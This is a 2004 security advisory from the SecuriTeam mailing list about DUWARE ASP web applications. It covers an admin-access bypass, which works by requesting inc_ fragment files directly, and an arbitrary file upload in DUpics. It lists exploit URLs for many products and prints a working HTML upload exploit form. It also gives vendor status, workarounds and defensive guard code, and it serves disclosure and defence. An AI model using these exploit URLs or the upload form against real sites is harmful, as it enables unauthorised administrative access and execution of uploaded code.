[NEWS] DUWARE Products Admin Access And Arbitrary File Upload Vulnerability
From: SecuriTeam (support_at_securiteam.com)
Date: 01/22/04
To: list@securiteam.com Date: 22 Jan 2004 14:56:45 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
DUWARE Products Admin Access And Arbitrary File Upload Vulnerability
------------------------------------------------------------------------
SUMMARY
<http://www.duware.com/> DUWARE is a software developer that provides
web-based applications such as forums, e-commerce systems, image
galleries, etc.
A vulnerability shared by all products currently available from DUWARE has
been discovered. It allows attackers to gain administrative access and to
upload arbitrary files.
DETAILS
Vulnerable Systems:
* DUcalendar versions 1.0, 1.1
* DUclassified versions 4.0, 4.1
* DUdirectory version 3.0
* DUdownload version 1.0
* DUgallery versions 3.0, 3.1, 3.2, 3.3
* DUpics version 3.0
* DUportal version 3.0
* DUarticle version 1.0
* DUclassmate version 1.0
* DUpoll version 3.0
* DUnews version 1.0
* DUamazon version 3.0
* DUpaypal version 3.0
* DUfaq version 1.0
* DUforum version 3.0
Admin Access
The vulnerability, present in all DUWARE products, allows malicious users
to gain administrator privileges. As an example, the /admin/edit.asp page
of DUcalendar is presented below:
----------------------------------------------------
<% Response.Buffer = True %>
<html>
<head>
<title>DUcalendar 1.0</title>
<link href="../assets/DUcalendar.css" rel="stylesheet" type="text/css">
</head>
<body background="../assets/bg_main.gif" >
<table width="760" border="0" cellspacing="2" cellpadding="0">
  <tr>
    <td>
      <!--#include file="inc_header.asp" -->
    </td>
  </tr>
  <tr>
    <td>
      <table width="100%" border="0" cellpadding="0" cellspacing="1" bgcolor="#003399">
        <tr>
          <td bgcolor="#FFFFFF">
            <!--#include file="inc_menu.asp" -->
            <!--#include file="inc_edit.asp" -->
          </td>
        </tr>
      </table>
    </td>
  </tr>
  <tr>
    <td>
      <!--#include file="inc_footer.asp" -->
    </td>
  </tr>
</table>
</body>
</html>
----------------------------------------------------
The page above includes the files inc_menu.asp and inc_edit.asp. The file
inc_menu.asp contains the security code that is supposed to prevent access
to edit.asp. The vulnerable code follows:
----------------------------------------------------
[...]
<%
' *** Restrict Access To Page: Grant or deny access to this page
MM_authorizedUsers=""
MM_authFailedURL="default.asp"
MM_grantAccess=false
If Session("MM_Username") <> "" Then
  If (true Or CStr(Session("MM_UserAuthorization"))="") Or _
     (InStr(1,MM_authorizedUsers,Session("MM_UserAuthorization"))>=1) Then
    MM_grantAccess = true
  End If
End If
If Not MM_grantAccess Then
  MM_qsChar = "?"
  If (InStr(1,MM_authFailedURL,"?") >= 1) Then MM_qsChar = "&"
  MM_referrer = Request.ServerVariables("URL")
  if (Len(Request.QueryString()) > 0) Then MM_referrer = MM_referrer & "?" & Request.QueryString()
  MM_authFailedURL = MM_authFailedURL & MM_qsChar & "accessdenied=" & Server.URLEncode(MM_referrer)
  Response.Redirect(MM_authFailedURL)
End If
%>
[...]
----------------------------------------------------
The security problem comes down to three factors:
* All of the administrator's code is in one file (the inc_ fragment, here
inc_edit.asp).
* That file itself includes the file that opens the database connection:
<!--#include file="../Connections/connDUcalendarAdmin.asp" -->
* No check of the administrator's rights is made in this file, on the
assumption that the check was already made in edit.asp.
Since the inc_ fragment is an ordinary .asp file under the web root, it can
be requested directly, and in that case the session check in inc_menu.asp
never runs.
Arbitrary File Upload
A vulnerability has been identified in DUpics that allows malicious users
to upload and execute arbitrary code by bypassing the JavaScript filters,
which run only in the browser.
Example exploits
Admin Access:
* http://[target]/admin/inc_edit.asp?iEve=1
* http://[target]/admin/inc_events.asp
* http://[target]/admin/inc_type.asp
>> DUclassified :
* http://[target]/admin/inc_cats.asp
* http://[target]/admin/inc_users.asp
* http://[target]/admin/inc_user_edit.asp?id=admin
>> DUdirectory :
* http://[target]/admin/inc_links.asp
* http://[target]/admin/inc_edit.asp?iLink=10
* http://[target]/admin/inc_type.asp
>> DUdownload :
* http://[target]/admin/inc_files.asp
* http://[target]/admin/inc_edit.asp?iFile=50
* http://[target]/admin/inc_type.asp
>> DUgallery :
* http://[target]/admin/inc_pictures.asp
* http://[target]/admin/inc_edit.asp?iPic=100
* http://[target]/admin/inc_type.asp
>> DUpics :
* http://[target]/admin/inc_add.asp
* http://[target]/admin/inc_pics.asp
* http://[target]/admin/inc_edit.asp?iPic=500
* http://[target]/admin/inc_type.asp
>> DUportal :
* http://[target]/admin/inc_channel_listing.asp
* http://[target]/admin/inc_channel_edit.asp?iChannel=5
* http://[target]/admin/inc_config.asp
* http://[target]/admin/inc_users.asp
* http://[target]/admin/inc_users_edit.asp?iUser=admin
etc...
Arbitrary File Upload :
>> DUpics :
------------------Dupicsexploit.html------------------
<html>
<head><title>DUpics 3.0 Arbitrary File Upload Exploit</title></head>
<body>
<form action="/admin/inc_add.asp?GP_upload=true" method="post"
      enctype="multipart/form-data"
      onsubmit="this.action=this.url.value+this.action;alert('Your file will be uploaded to '+this.url.value+'/pictures/');">
Target URL : <input type="text" name="url" value="http://[target]/DUpics/"><br>
FILE : <input name="PIC_IMAGE" type="file"><br>
<input type="hidden" name="PIC_NAME" value="admin">
<input type="hidden" name="PIC_WIDTH">
<input type="hidden" name="PIC_HEIGHT">
<input type="hidden" name="PIC_APPROVED" value="1">
<input type="hidden" name="MM_insert" value="true">
<input type="submit" value="Upload" name="submit">
</form>
<p align="right">For more information about this exploit :
<a href="http://www.security-corporation.com/advisories-026.html"
   target="_blank"> Security-Corporation.com</a></p>
</body>
</html>
------------------Dupicsexploit.html------------------
Vendor Status:
DUWare Services has been notified and has released a fix for all
products.
Workarounds:
At least one of the three factors listed above must be changed. Either do
not put all of the administration code in the inc_ files; or remove the
database connection include,
<!--#include file="../Connections/connDUcalendarAdmin.asp" -->,
from every inc_ file and place it only in the main file; or check the admin
session in every inc_ file.
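The following classic ASP (VBScript) code is an added example, not DUWARE's code or the vendor's fix. It shows the third workaround (checking the admin session in every inc_ file) together with a server-side counterpart to the client-side upload filter described under Arbitrary File Upload. It assumes the Dreamweaver-style session variable MM_Username and the login page default.asp that appear in the advisory's own code; the file names inc_guard.asp, the variable sFileName and the "Part B" placement in inc_add.asp are assumptions for illustration.

```asp
<%
' ---- Part A: inc_guard.asp (added example, not DUWARE code) ----
' Include as the FIRST line of every admin page AND every inc_*.asp fragment:
'     <!--#include file="inc_guard.asp" -->
' Written as straight-line code with no Dim, Sub or Function on purpose:
' a page that includes it several times (the parent plus each fragment)
' would otherwise fail with VBScript's "Name redefined" error.

' 1. Refuse direct requests for fragments.
'    #include is resolved before the page executes, so inside a
'    legitimately included fragment SCRIPT_NAME still names the parent
'    page (e.g. /admin/edit.asp). Only a direct request makes SCRIPT_NAME
'    itself point at an inc_ file.
If InStr(LCase(Request.ServerVariables("SCRIPT_NAME")), "/inc_") > 0 Then
    Response.Status = "404 Not Found"
    Response.End
End If

' 2. Require an authenticated admin session (MM_Username is the session
'    variable set by the login page in the advisory's code). Empty and ""
'    are both treated as "not logged in".
If Len(Session("MM_Username") & "") = 0 Then
    Response.Redirect "default.asp?accessdenied=" & _
        Server.URLEncode(Request.ServerVariables("SCRIPT_NAME"))
End If
%>

<%
' ---- Part B: define once in the upload handler (inc_add.asp) ----
' The JavaScript filter in the form can be removed by the client, so the
' same decision must be made on the server before the file is written.
Function IsAllowedImageName(sName)
    Dim iDot
    IsAllowedImageName = False
    If Len(sName & "") = 0 Or Len(sName & "") > 100 Then Exit Function
    ' No path separators or NUL bytes in the name that will be stored.
    If InStr(sName, "/") > 0 Or InStr(sName, "\") > 0 _
        Or InStr(sName, Chr(0)) > 0 Then Exit Function
    ' Exactly one dot, so the last extension is the only extension
    ' (rejects names such as page.asp.jpg).
    iDot = InStrRev(sName, ".")
    If iDot = 0 Or InStr(sName, ".") <> iDot Then Exit Function
    Select Case LCase(Mid(sName, iDot + 1))
        Case "jpg", "jpeg", "gif", "png"
            IsAllowedImageName = True
    End Select
End Function

' Usage in the handler, before the upload component saves the file
' (sFileName is assumed to hold the client-supplied name of PIC_IMAGE):
'     If Not IsAllowedImageName(sFileName) Then
'         Response.Status = "400 Bad Request"
'         Response.End
'     End If
%>
```

Part A makes a direct request for any inc_ file return 404 regardless of session state, and makes the parent page enforce the login before any fragment code runs; when a fragment is included normally the guard sees the parent's SCRIPT_NAME and does nothing. Part B deliberately allows only a short list of image extensions rather than blocking known script extensions, so an extension the developer did not think of is rejected by default.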
ADDITIONAL INFORMATION
The information has been provided by frog-m@n
<mailto:frog-man@security-corporation.com>.
The original article can be found at:
http://www.security-corporation.com/advisories-026.html
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.